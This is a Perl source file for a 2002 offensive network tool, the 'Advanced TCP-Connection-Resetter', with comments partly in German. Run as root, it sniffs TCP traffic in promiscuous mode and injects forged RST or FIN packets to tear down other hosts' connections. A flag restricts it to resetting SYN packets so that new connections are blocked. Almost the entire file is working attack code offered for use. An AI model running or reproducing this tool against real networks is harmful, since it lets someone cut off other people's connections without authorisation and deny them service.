#!/usr/bin/perl
# Advanced TCP-Connection-Resetter
#
# Autor: stefan@krecher.de
# TheMidget
#
# Lizenz: GPL
#
# Heavily updated by Bastian Ballmann [bytebeater@crazydj.de]
#
# Last Update: 22.12.2002
############################################################################

# Are you root?
if($> != 0)
{
    die "You must be root...\n\n";
}


###[ Loading Modules ]###

use path::config;   # Checking config
use path::hijack;   # Hijacking stuff
use Getopt::Std;    # Parsing parameter
use Net::PcapUtils; # Sniffin around


###[ MAIN PART ]###

# User needs help
if($ARGV[0] eq "--help")
{
    help();
}

# Globale Variablen
my $connection;

# Reset only SYN packets?
my $reset_syn = 0;

# Standard Reset Flag
my $reset_flag = "rst";


# Starte die GUI Version
if($ARGV[0] eq "--gui")
{
    require "easterrst-gui.pl";
}
else
{
# Parsing parameter
getopts('h:c:p:i:t:Srf',\%args);
start(%args);
}




###[ Subroutines ]###

# Start the process
sub start
{
    my %args = @_;

# Create a new config object
    my $cfg = config->new();

# Config verarbeiten
    if($cfg->check(%args) == 1)
    {
	exit(1);
    }

# Achtung Werbung!!! =)
unless($ARGV[0] eq "--gui")
{
    about();
}


# Reset via FIN?
if($args{'f'})
{
    $reset_flag = "fin";
}


# Reset only SYN packets?
if($args{S})
{
    $reset_syn = 1;
}


# GUI neu zeichnen
if($ARGV[0] eq "--gui")
{
    $result->insert(end," * Started RST deamon\n");
    $result->see(end);
    $top->update();
}

# Create a pcap expression
my $pcap = $cfg->pcap();

if($pcap ne "")
{
    $pcap .= "and tcp";
}
else
{
    $pcap = "tcp";
}

if($ARGV[0] eq "--gui")
{
    $result->insert(end,"\nSniffing $pcap on " . $cfg->get_device . "\n");
    $result->see(end);
    $top->update();
}
else
{
    print "\n       Sniffing $pcap on " . $cfg->get_device . "\n";
}

if($reset_syn)
{
    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"Resetting only SYN packets with $reset_flag packets\n\n");
	$result->see(end);
	$top->update();
    }
    else
    {
	print "       Resetting only SYN packets with $reset_flag packets\n\n";
    }
}
else
{
    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"Resetting all packets with $reset_flag packets\n\n");
	$result->see(end);
	$top->update();
    }
    else
    {
	print "       Resetting all packets with $reset_flag packets\n\n";
    }
}


# Sniffen!!! Gesundheit =)
Net::PcapUtils::loop(\&process_pkt,
                     PROMISC => 1, 
                     FILTER => $pcap,
                     DEV => $cfg->get_device,
		     NUMPACKETS => -1) || die "Shit! There was an error!\n$!\n";

}


# Funktion "process_pkt($arg, $hdr, $pkt)" wird fr jedes
# eingefangene Paket aufgerufen
sub process_pkt {
  my($arg, $hdr, $pkt) = @_;

# GUI neu zeichnen
if($ARGV[0] eq "--gui")
{
    $top->update();
}

# Create a hijack object?
if($connection)
{
    $connection->update($pkt); 
}
else
{
   $connection = hijack->new($pkt);
   return;
}

# Ist das Packet ein RST Packet?
# Wir resetten kein RST, wir sind ja nicht bloed! =)
unless($connection->check_flag($pkt,"rst"))
{
    # Sollen nur SYN Pakete resettet werden?
    if($reset_syn)
    {
	# Hat das Paket das SYN Flag gesetzt?
	if($connection->check_flag($pkt,"syn"))
	{
	    # SYN / ACK wollen wir nicht resetten
	    unless($connection->check_flag($pkt,"ack"))
	    {
		$connection->reset($reset_flag);
		
		# Ausgabe im GUI?
		if($ARGV[0] eq "--gui")
		{
		    $result->insert(end,"Send $reset_flag packet. $connection->{src_ip}:$connection->{src_port} --> $connection->{dest_ip}:$connection->{dest_port} SEQ: $connection->{seqnum}\n");
		    $result->see(end);
		    $top->update();
		}
		else
		{
		    print "Send $reset_flag packet. $connection->{src_ip}:$connection->{src_port} --> $connection->{dest_ip}:$connection->{dest_port} SEQ: $connection->{seqnum}\n";
		}
	    }
	}
    }
    else
    {
	$connection->reset($reset_flag);

	# Ausgabe im GUI?
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"Send " . uc($reset_flag) . " $connection->{src_ip}:$connection->{src_port} --> $connection->{dest_ip}:$connection->{dest_port} SEQ: $connection->{seqnum}\n");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print "Send " . uc($reset_flag) . " $connection->{src_ip}:$connection->{src_port} --> $connection->{dest_ip}:$connection->{dest_port} SEQ: $connection->{seqnum}\n";
	}
    }
}
}



# Print Usage
sub help
{
    my $error = shift;

    &about();

if($error eq "toomuch")
{
    print ">>>  Please choose either target or connection!\n\n";
}

    print ">>> Usage: $0 -f -r -S -i <device> -p <port> -h <hosts> -c <connection>\n\n";
    print "    -f: Reset connection via FIN packet\n";
    print "    -r: Reset connection via RST packet (default)\n";
    print "    -S: Reset only SYN packets\n";
    exit(0);
}


# Print about
sub about
{
# Achtung Werbung!!! =)
system"/usr/bin/setterm -foreground green -background black -default";
system"/usr/bin/clear";
print "\n\n      ---------:[ Advanced TCP-Connection-Resetter\n";
print "      ---:[ Programmed by Bastian Ballmann and Stefan Krecher\n";
print "      " . "-" x 55 . "\n\n";
}
